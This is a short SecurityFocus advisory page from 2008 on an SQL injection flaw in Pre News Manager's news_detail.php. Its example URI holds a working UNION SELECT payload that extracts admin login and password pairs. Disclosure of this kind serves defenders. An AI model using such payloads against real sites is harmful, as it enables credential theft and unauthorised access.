Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Pre News Manager 'news_detail.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin--







 

Privacy Statement
Copyright 2008, SecurityFocus